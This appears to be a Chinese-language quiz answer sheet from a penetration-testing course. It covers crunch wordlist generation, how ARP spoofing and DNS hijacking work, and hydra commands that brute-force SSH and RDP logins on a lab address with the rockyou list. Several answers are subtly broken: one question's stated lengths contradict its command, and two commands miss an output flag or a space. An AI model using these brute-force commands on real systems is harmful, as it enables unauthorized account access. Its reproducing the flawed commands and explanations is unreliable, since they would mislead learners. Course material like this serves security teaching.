一、简答题 1、在生成字典时,有哪些思路来生成有用的字典? 常用的用户名密码,姓名,身份证,手机号码等 2、利用crunch生成一个前五位是xiaoming,后三位是数字的8位数字典,名为test.txt命令是什么? crunch 11 11 -t xiaoming%%% 3、利用crunch生成3位数的字典,以密码库charset.lst中mixalpha-numeric-symbol14模块的,名为user.txt命令是什么? crunch 3 3 -f /usr/share/crunch/charset.lstmixalpha-numeric-symbol14 -o user.txt 4、利用crunch生成以1831903为前七位的电话号码的命令,名为aa.Txt是什么? crunch 11 11 -t 1831903%%%% -o aa.txt 5、利用crunch生成第1-3位为abc,第四位为符号,第五位为大写字母,第六位为小写字母,第七位为数字的七位数字典,名为cc.txt的命令是什么? crunch 7 7 -t abc^,@% -o cc.txt 6、arp中间人攻击的原理是什么? 通过对受害者发送大量arp报文,将攻击者电脑中,网关的mac欺骗为攻击者电脑的mac地址 7、Dns劫持的原理是什么? 在arp欺骗的前提下,将流量转发到恶意的dns的服务器上 二、实操题 利用hydra爆破ssh服务。 hydra -l ssh -P/usr/share/wordlists/rockyou.txt ssh://192.168.100.128 利用hydra爆破rdp服务 hydra -l administrator -P/usr/share/wordlists/rockyou.txt rdp://192.168.100.128
| 
